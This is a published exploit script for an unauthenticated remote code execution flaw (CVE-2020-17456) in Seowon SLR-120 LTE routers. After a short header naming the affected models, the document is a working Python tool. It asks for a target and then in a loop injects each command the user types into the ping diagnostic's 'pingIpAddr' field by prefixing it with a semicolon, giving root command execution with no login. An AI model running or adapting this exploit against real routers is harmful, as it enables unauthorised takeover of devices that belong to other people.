# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated) # Date: 2022-03-11 # Exploit Author: Aryan Chehreghani # Vendor Homepage: http://www.seowonintech.co.kr # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30 # Version: All version # Tested on: Windows 10 Enterprise x64 , Linux # CVE : CVE-2020-17456 # [ About - Seowon SLR-120 router ]: #The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile, #The convenience of sharing wireless internet access invigorates your lifestyle, families, #friends and workmates. Carry it around to boost your active communication anywhere. # [ Description ]: #Execute commands without authentication as admin user , #To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user. # [ Vulnerable products ]: #SLR-120S42G #SLR-120D42G #SLR-120T42G import requests print (''' ########################################################### # Seowon SLR-120S42G router - RCE (Unauthenticated) # # BY:Aryan Chehreghani # # Team:TAPESH DIGITAL SECURITY TEAM IRAN # # mail:aryanchehreghani@yahoo.com # # -+-USE:python script.py # # Example Target : http://192.168.1.1:443/ # ########################################################### ''') url = input ("=> Enter Target : ") while(True): try: cmd = input ("~Enter Command $ ") header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "*/*", "Accept-Language": "en-US,en;q:0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "207", "Origin": "http://192.168.1.1", "Connection": "close", "Referer": "http://192.168.1.1/", "Upgrade-Insecure-Requests": "1" } datas = { 'Command':'Diagnostic', 'traceMode':'ping', 'reportIpOnly':'', 'pingIpAddr':';'+cmd, 'pingPktSize':'56', 'pingTimeout':'30', 'pingCount':'4', 'maxTTLCnt':'30', 'queriesCnt':'3', 'reportIpOnlyCheckbox':'on', 'logarea':'com.cgi', 'btnApply':'Apply', 'T':'1646950471018' } x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas) print(x.text) except: break